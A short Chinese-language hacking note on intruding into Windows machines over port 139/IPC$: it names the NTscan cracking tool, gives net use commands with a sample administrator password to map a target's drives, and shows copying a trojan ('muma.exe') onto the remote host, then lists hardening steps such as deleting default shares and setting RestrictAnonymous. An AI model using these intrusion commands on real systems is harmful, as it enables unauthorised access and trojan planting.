139端口 入侵
139端口 和防火墙 无关
139端口是server服务把他关掉就没用了
是共享打印机的
工具 NTscan
入侵135的时候 要把工具文件夹选项,简单文件共享,去掉,他会把联网的那些弄成guest权限
开放目标的ipc$ 执行命令 net share ipc$
使用命令 net use z: \目标IPc$ "密码" /user:"用户名"将对方的c盘映射为自己的z盘,其他盘类推
net use \目标IPipc$ "密码" /user:"用户名"
net use \192.168.1.108ipc$ "5201314a"/user:"administrator"
4,怎样映射和访问默认共享?
使用命令 net use z: \目标IPc$ "密码" /user:"用户名"将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe。当路径中包含空格时,须用""将路径全引住。
5,如何删除映射和ipc$连接?
用命令 net use \IPipc$ /del删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
7,怎样防止别人用ips$和默认共享入侵我?
A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net s hare admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接